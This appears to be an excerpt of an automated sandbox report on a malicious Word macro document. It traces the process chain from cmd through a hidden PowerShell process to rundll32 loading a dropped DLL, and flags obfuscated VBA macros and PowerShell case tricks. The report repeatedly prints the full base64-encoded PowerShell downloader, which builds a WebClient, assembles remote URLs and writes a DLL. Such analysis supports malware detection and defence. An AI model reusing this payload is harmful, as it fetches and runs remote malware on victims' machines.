                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1Jump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLLJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
                Source: v22Pc0qA.doc.docInitial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

                Data Obfuscation:

                barindex
                Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                Source: v22Pc0qA.doc.docStream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
                Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0iName: Lxvinhyq0hu0i
                PowerShell case anomaly foundShow sources
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
